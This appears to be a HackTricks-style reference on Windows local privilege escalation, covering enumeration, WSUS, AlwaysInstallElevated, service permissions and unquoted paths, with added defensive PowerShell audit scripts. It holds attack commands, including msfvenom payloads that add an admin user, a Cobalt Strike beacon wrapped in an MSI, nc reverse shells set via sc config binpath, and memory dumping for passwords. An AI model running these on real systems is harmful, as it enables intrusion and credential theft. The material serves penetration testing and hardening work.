Windows Local Privilege Escalation
Best tool to look for Windows local privilege escalation vectors: WinPEAS
Initial Windows Theory
Access Tokens
If you don't know what Windows Access Tokens are, read the following page before continuing:
ACLs - DACLs/SACLs/ACEs
Check the following page for more information about ACLs - DACLs/SACLs/ACEs:
Integrity Levels
If you don't know what integrity levels are in Windows, you should read the following page before continuing:
Windows Security Controls
There are different things in Windows that could prevent you from enumerating the system, running executables, or even detect your activities. You should read the following page and enumerate all these defense mechanisms before starting the privilege escalation enumeration:
System Info
Version info enumeration
Check if the Windows version has any known vulnerability (check also the patches applied).
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Version Exploits
This site is handy for searching out detailed information about Microsoft security vulnerabilities. This database has more than 4,700 security vulnerabilities, showing the massive attack surface that a Windows environment presents.
On the system
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (Winpeas has watson embedded)
Locally with system information
Github repos of exploits:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
Environment
Any credential/juicy info saved in the env variables?
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
PowerShell History
ConsoleHost_history #Find the path where it is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
PowerShell Transcript files
You can learn how to turn this on in https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
#Check if it is enabled in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
Details of PowerShell pipeline executions are recorded, encompassing executed commands, command invocations, and parts of scripts. However, full execution details and output results might not be captured.
To enable this, follow the instructions in the "Transcript files" section of the documentation, opting for "Module Logging" instead of "Powershell Transcription".
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
To view the last 15 events from the PowerShell logs you can execute:
Get-WinEvent -LogName "Windows PowerShell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
A complete activity and full content record of the script's execution is captured, ensuring that every block of code is documented as it runs. This process preserves a comprehensive audit trail of each activity, valuable for forensics and for analyzing malicious behavior. By documenting all activity at the time of execution, detailed insight into the process is provided.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
The Script Block logging events can be found in the Windows Event Viewer at the path: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
To view the last 20 events you can use:
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | select -First 20 | Out-GridView
Internet Settings
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Drives
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
You can compromise the system if the updates are not requested using httpS but http.
You start by checking if the network uses a non-SSL WSUS update by running the following in cmd:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Or the following in PowerShell:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
If you get a reply such as one of these:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
WUServer : http://xxxx-updxx.corp.internal.com:8530
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName : windowsupdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" is equal to 1.
Then, it is exploitable. If the last registry value is equal to 0, then the WSUS entry will be ignored.
To exploit this vulnerability you can use tools like: Wsuxploit, pyWSUS - These are MiTM weaponized exploit scripts to inject 'fake' updates into non-SSL WSUS traffic.
Read the research here:
WSUS CVE-2020-1013
Read the complete report here.
Basically, this is the flaw that this bug exploits:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
You can exploit this vulnerability using the tool WSUSpicious (once it is released).
Third-Party Auto-Updaters and Agent IPC (local privesc)
Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker-controlled server and the updater trusts a rogue root CA or performs weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See the generalised technique (based on the Netskope stAgentSvc chain, CVE-2025-0309) here:
KrbRelayUp
A local privilege escalation vulnerability exists in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these requirements are met using default settings.
Find the exploit in https://github.com/Dec0ne/KrbRelayUp
For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If these 2 registry values are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No UAC format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using msiexec the UAC prompt won't be shown
If you have a meterpreter session you can automate this technique using the module exploit/windows/local/always_install_elevated
PowerUP
Use the Write-UserAddMSI command from power-up to create inside the current directory a Windows MSI binary to escalate privileges. This script writes out a precompiled MSI installer that prompts for a user/group addition (so you will need GUI access):
Write-UserAddMSI
Just execute the created binary to escalate privileges.
MSI Wrapper
Read this tutorial to learn how to create an MSI wrapper using these tools. Note that you can wrap a ".bat" file if you just want to execute command lines.
Create MSI with WIX
Create MSI with Visual Studio
- Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe
- Open Visual Studio, select Create a new project and type "installer" into the search box. Select the Setup Wizard project and click Next.
- Give the project a name, like AlwaysPrivesc, use C:\privesc for the location, select place solution and project in the same directory, and click Create.
- Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.
- Highlight the AlwaysPrivesc project in the Solution Explorer and in the Properties, change TargetPlatform from x86 to x64.
- There are other properties you can change, such as Author and Manufacturer, which can make the installed app look more legitimate.
- Right-click the project and select View > Custom Actions.
- Right-click Install and select Add Custom Action.
- Double-click on Application Folder, select your beacon.exe file and click OK. This will ensure that the beacon payload is executed as soon as the installer is run.
- Under the Custom Action Properties, change Run64Bit to True.
- Finally, build it.
- If the warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' is shown, make sure you set the platform to x64.
MSI Installation
To execute the installation of the malicious .msi file in the background:
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
To exploit this vulnerability you can use: exploit/windows/local/always_install_elevated
Antivirus and Detectors
Audit Settings
These settings decide what is being logged, so you should pay attention to them
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding: it is interesting to know where the logs are sent
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS is designed for the management of local Administrator passwords, ensuring that each password is unique, randomised, and regularly updated on computers joined to a domain. These passwords are stored securely within Active Directory and can only be accessed by users who have been granted sufficient permissions through ACLs, allowing them to view local admin passwords if authorized.
WDigest
If active, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
LSA Protection
Starting with Windows 8.1, Microsoft introduced enhanced protection for the Local Security Authority (LSA) to block attempts by untrusted processes to read its memory or inject code, further securing the system.
More info about LSA Protection here.
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
Credentials Guard
Credential Guard was introduced in Windows 10. Its purpose is to safeguard the credentials stored on a device against threats like pass-the-hash attacks. More info about Credentials Guard here.
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
Cached Credentials
Domain credentials are authenticated by the Local Security Authority (LSA) and utilized by operating system components. When a user's logon data is authenticated by a registered security package, domain credentials for the user are typically established.
More info about Cached Credentials here.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
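As an added example (not HackTricks' own code), the following PowerShell audit reads the settings covered in the WSUS, AlwaysInstallElevated, WDigest, LSA Protection, Credential Guard, cached credentials and PowerShell logging sections above and reports each one as OK or WEAK with the reason, so a defender can check a host against the same list an attacker would enumerate. The value names it reads (WUServer, UseWUServer, AlwaysInstallElevated, UseLogonCredential, RunAsPPL, LsaCfgFlags, CachedLogonsCount, EnableScriptBlockLogging, EnableModuleLogging, EnableTranscripting) are the policy value names that live under the keys shown on this page; the function names are mine.

```powershell
# Added example, not HackTricks code: hardening audit of the registry settings this page
# enumerates. Runs as a normal user; the HKLM keys involved are world-readable.

function Get-RegValue {
    # Returns the value's data, or $null when the key or the value does not exist.
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function New-Finding {
    param([string]$Check, [bool]$Weak, [string]$Detail)
    [pscustomobject]@{
        Check  = $Check
        Status = $(if ($Weak) { 'WEAK' } else { 'OK' })
        Detail = $Detail
    }
}

function Test-WindowsPrivescBaseline {
    $f = @()

    # WSUS: weak only when the client is pointed at a WSUS server (UseWUServer=1)
    # AND that server is reached over clear-text HTTP (fake updates can be injected by a MITM).
    $wu     = 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate'
    $server = Get-RegValue $wu 'WUServer'
    $useWu  = Get-RegValue "$wu\AU" 'UseWUServer'
    $wsusWeak = ($useWu -eq 1) -and ($server -match '^http://')
    $f += New-Finding 'WSUS update transport' $wsusWeak "UseWUServer=$useWu WUServer=$server (weak when 1 and http://)"

    # AlwaysInstallElevated: BOTH the HKCU and the HKLM value must be 1 for MSIs to run as SYSTEM.
    $aieU = Get-RegValue 'HKCU:\Software\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    $aieM = Get-RegValue 'HKLM:\Software\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    $f += New-Finding 'AlwaysInstallElevated' (($aieU -eq 1) -and ($aieM -eq 1)) "HKCU=$aieU HKLM=$aieM (weak only when both are 1)"

    # WDigest: UseLogonCredential=1 keeps clear-text passwords in LSASS memory.
    $wd = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    $f += New-Finding 'WDigest UseLogonCredential' ($wd -eq 1) "Value=$wd (weak when 1)"

    # LSA Protection: RunAsPPL 1 (UEFI-locked) or 2 (not locked) means LSASS runs as a protected process.
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $ppl = Get-RegValue $lsa 'RunAsPPL'
    $f += New-Finding 'LSA Protection (RunAsPPL)' (-not ($ppl -eq 1 -or $ppl -eq 2)) "Value=$ppl (weak when absent or 0)"

    # Credential Guard: LsaCfgFlags 1 (UEFI-locked) or 2 (not locked) means enabled.
    $cg = Get-RegValue $lsa 'LsaCfgFlags'
    $f += New-Finding 'Credential Guard (LsaCfgFlags)' (-not ($cg -eq 1 -or $cg -eq 2)) "Value=$cg (weak when absent or 0)"

    # Cached domain logons: the value is a REG_SZ string; the Windows default is 10.
    $cached = Get-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' 'CachedLogonsCount'
    $f += New-Finding 'Cached domain logons' ([int]$cached -gt 0) "CachedLogonsCount=$cached (cached verifiers are an offline cracking target)"

    # PowerShell logging policies: their absence weakens detection rather than enabling privesc,
    # but the "is logging on?" registry checks from this page belong in the same baseline.
    $ps  = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell'
    $sbl = Get-RegValue "$ps\ScriptBlockLogging" 'EnableScriptBlockLogging'
    $mod = Get-RegValue "$ps\ModuleLogging"      'EnableModuleLogging'
    $tr  = Get-RegValue "$ps\Transcription"      'EnableTranscripting'
    $f += New-Finding 'PowerShell script block logging' ($sbl -ne 1) "EnableScriptBlockLogging=$sbl (event ID 4104 when 1)"
    $f += New-Finding 'PowerShell module logging'       ($mod -ne 1) "EnableModuleLogging=$mod"
    $f += New-Finding 'PowerShell transcription'        ($tr  -ne 1) "EnableTranscripting=$tr"

    return $f
}

Test-WindowsPrivescBaseline | Format-Table -AutoSize -Wrap
```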
Users & Groups
Enumerate Users & Groups
You should check if any of the groups you belong to have interesting permissions
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Privileged groups
If you belong to some privileged group you may be able to escalate privileges. Learn about privileged groups and how to abuse them to escalate privileges here:
Token manipulation
Learn more about what a token is in this page: Windows Tokens.
Check the following page to learn about interesting tokens and how to abuse them:
Logged users / Sessions
qwinsta
klist sessions
Home folders
dir C:\Users
Get-ChildItem C:\Users
Password Policy
net accounts
Get the content of the clipboard
powershell -command "Get-Clipboard"
Running Processes
File and Folder Permissions
First of all, when listing the processes check for passwords inside the command line of the process.
Check if you can overwrite some running binary or if you have write permissions on the binary folder to exploit possible DLL Hijacking attacks:
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Always check for possible electron/cef/chromium debuggers running; you could abuse them to escalate privileges.
Checking permissions of the processes binaries
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
Checking permissions of the folders of the processes binaries (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
Memory Password mining
You can create a memory dump of a running process using procdump from Sysinternals. Services like FTP have the credentials in clear text in memory; try to dump the memory and read the credentials.
procdump.exe -accepteula -ma <proc_name_tasklist>
Insecure GUI apps
Applications running as SYSTEM may allow a user to spawn a CMD, or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
Services
Service Triggers let Windows start a service when certain conditions occur (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, etc.). Even without SERVICE_START rights you can often start privileged services by firing their triggers. See enumeration and activation techniques here:
Get a list of services:
net start
wmic service list brief
sc query
Get-Service
Permissions
You can use sc to get information about a service
sc qc <service_name>
It is recommended to have the accesschk binary from Sysinternals to check the required privilege level for each service.
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
It is recommended to check if "Authenticated Users" can modify any service:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
You can download accesschk.exe for XP from here
Enable service
If you are having this error (for example with SSDPSRV):
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
You can enable it using
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Take into account that the service upnphost depends on SSDPSRV to work (for XP SP1)
Another workaround for this problem is running:
sc.exe config usosvc start= auto
Modify service binary path
In the scenario where the "Authenticated users" group possesses SERVICE_ALL_ACCESS on a service, modification of the service's executable binary is possible. To modify it and execute, use sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Restart service
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Privileges can be escalated through various permissions:
- SERVICE_CHANGE_CONFIG: Allows reconfiguration of the service binary.
- WRITE_DAC: Enables permission reconfiguration, leading to the ability to change service configurations.
- WRITE_OWNER: Permits ownership acquisition and permission reconfiguration.
- GENERIC_WRITE: Inherits the ability to change service configurations.
- GENERIC_ALL: Also inherits the ability to change service configurations.
For the detection and exploitation of this vulnerability, exploit/windows/local/service_permissions can be utilized.
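The rights listed above map directly onto bits of the service object's access mask. As an added example (not HackTricks code, and not a replacement for accesschk), the following PowerShell parses the SDDL string that `sc.exe sdshow` returns with .NET's RawSecurityDescriptor and flags services whose DACL grants SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE or GENERIC_ALL to Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE, or to any SID in the current user's token. The function names (Get-ServiceSddl, Get-WeakServiceAce, Find-WeakServiceAcl) are mine.

```powershell
# Added example, not HackTricks code: locate services with DACLs that let low-privileged
# principals reconfigure them, the condition abused by `sc config ... binpath=` above.

# Service-object access bits behind the rights listed on this page (SDDL mnemonic in brackets).
$SvcChangeConfig = 0x00000002   # SERVICE_CHANGE_CONFIG [DC]
$WriteDac        = 0x00040000   # WRITE_DAC             [WD]
$WriteOwner      = 0x00080000   # WRITE_OWNER           [WO]
$GenericWrite    = 0x40000000   # GENERIC_WRITE         [GW]
$GenericAll      = 0x10000000   # GENERIC_ALL           [GA]
$DangerousMask   = $SvcChangeConfig -bor $WriteDac -bor $WriteOwner -bor $GenericWrite -bor $GenericAll

# Everyone, Authenticated Users, BUILTIN\Users, NT AUTHORITY\INTERACTIVE
$BroadSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')

function Get-ServiceSddl {
    # `sc.exe sdshow` prints a blank line followed by the security descriptor in SDDL form.
    param([string]$Name)
    $lines = @(sc.exe sdshow $Name 2>$null)
    return ($lines | Where-Object { $_ -match '^[ODGS]:' } | Select-Object -First 1)
}

function Get-WeakServiceAce {
    param([string]$Name, [string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Sddl
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only allow-ACEs that carry at least one of the dangerous bits are interesting.
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceQualifier -ne [System.Security.AccessControl.AceQualifier]::AccessAllowed) { continue }
        if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }

        $sid = $ace.SecurityIdentifier.Value
        $reason = $null
        if ($BroadSids -contains $sid)  { $reason = 'broad principal' }
        elseif ($mySids -contains $sid) { $reason = 'current user or group' }
        if (-not $reason) { continue }

        # Resolve the SID to an account name when possible; keep the raw SID otherwise.
        $account = $sid
        try { $account = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { }

        [pscustomobject]@{
            Service      = $Name
            Principal    = $account
            Reason       = $reason
            AccessMask   = ('0x{0:X8}' -f $ace.AccessMask)
            ChangeConfig = [bool]($ace.AccessMask -band $SvcChangeConfig)
            WriteDacOwn  = [bool]($ace.AccessMask -band ($WriteDac -bor $WriteOwner))
            GenericWA    = [bool]($ace.AccessMask -band ($GenericWrite -bor $GenericAll))
        }
    }
}

function Find-WeakServiceAcl {
    # Services whose descriptor cannot be read (access denied) are skipped silently.
    foreach ($svc in Get-Service) {
        $sddl = Get-ServiceSddl -Name $svc.Name
        if ($sddl) { Get-WeakServiceAce -Name $svc.Name -Sddl $sddl }
    }
}

Find-WeakServiceAcl | Format-Table -AutoSize
```

Any row with ChangeConfig set is a service whose binary path a low-privileged user can redirect; fix it with `sc.exe sdset` to remove the ACE rather than by hardening the binary alone.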
Services binaries weak permissions
Check if you can modify the binary that is executed by a service or if you have write permissions on the folder where the binary is located (DLL Hijacking).
You can get every binary that is executed by a service using wmic (not in system32) and check your permissions using icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
You can also use sc and icacls:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Services registry modify permissions
You should check if you can modify any service registry key.
You can check your permissions over a service registry key by doing:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
It should be checked whether Authenticated Users or NT AUTHORITY\INTERACTIVE possess FullControl permissions. If so, the binary executed by the service can be altered.
To change the Path of the binary executed:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
Services registry AppendData/AddSubdirectory permissions
If you have this permission over a registry key it means that you can create sub keys from this one. In the case of Windows services this is enough to execute arbitrary code:
AppendData/AddSubdirectory permission over service registry
Unquoted Service Paths
If the path to an executable is not inside quotes, Windows will try to execute every ending before a space.
For example, with the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
List all unquoted service paths, excluding those belonging to built-in Windows services:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services
# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
You can detect and exploit this vulnerability with metasploit: exploit/windows/local/trusted_service_path
You can manually create a service binary with metasploit:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
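As an added example (not HackTricks code) that goes one step beyond the listing commands above, the following PowerShell reproduces the search order just described for any unquoted service path (the cumulative prefixes before each space, each with .exe appended), tests which of those intercept directories the current user can really write to, and prints the `sc.exe config ... binPath=` command that quotes the path, which is the fix. Function names are mine; Get-CimInstance Win32_Service and Split-Path are standard cmdlets.

```powershell
# Added example, not HackTricks code: enumerate unquoted service paths, expand them into the
# candidate binaries Windows would try, and report which intercept points are writable.

function Get-UnquotedPathCandidate {
    # For 'C:\Program Files\Some Folder\Service.exe -arg' returns, in order:
    #   C:\Program.exe, C:\Program Files\Some.exe, C:\Program Files\Some Folder\Service.exe
    param([string]$PathName)
    $exe = $PathName
    if ($PathName -match '^(.*?\.exe)') { $exe = $Matches[1] }   # drop service arguments
    $tokens = $exe -split ' '
    $out = @()
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $prefix = ($tokens[0..($i - 1)]) -join ' '
        if ($i -lt $tokens.Count) { $prefix += '.exe' }          # every prefix is tried as <prefix>.exe
        $out += $prefix
    }
    return $out
}

function Test-DirectoryWritable {
    # Creates and deletes an empty probe file: a real access check, unlike reading the ACL.
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ('.probe-' + [guid]::NewGuid().ToString('N'))
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -notmatch '^C:\\Windows\\' } |
        ForEach-Object {
            $svc = $_
            $candidates = @(Get-UnquotedPathCandidate -PathName $svc.PathName)
            if ($candidates.Count -lt 2) { return }               # no space in the binary path
            $exe  = $candidates[-1]
            $tail = $svc.PathName.Substring($exe.Length)         # original arguments, if any
            # The last candidate is the real binary; the earlier ones are the hijack points.
            foreach ($c in $candidates[0..($candidates.Count - 2)]) {
                $dir = Split-Path -Parent $c
                [pscustomobject]@{
                    Service     = $svc.Name
                    StartMode   = $svc.StartMode
                    Candidate   = $c
                    Writable    = Test-DirectoryWritable -Directory $dir
                    Remediation = 'sc.exe config {0} binPath= "\"{1}\"{2}"' -f $svc.Name, $exe, $tail
                }
            }
        }
}

Find-UnquotedServicePath | Format-Table -AutoSize -Wrap
```

Run it as the low-privileged user being assessed: Writable is only meaningful for that identity, and a path with no writable intercept directory is misconfigured but not exploitable from that account.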
Recovery Actions
Windows allows users to specify actions to be taken if a service fails. This feature can be configured to point to a binary. If this binary is replaceable, privilege escalation might be possible. More details can be found in the official documentation.
Applications
Installed Applications
Check the permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders (DLL Hijacking).
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Write Permissions
Check if you can modify some config file to read some special file, or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).
A way to find weak folder/file permissions in the system is doing:
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
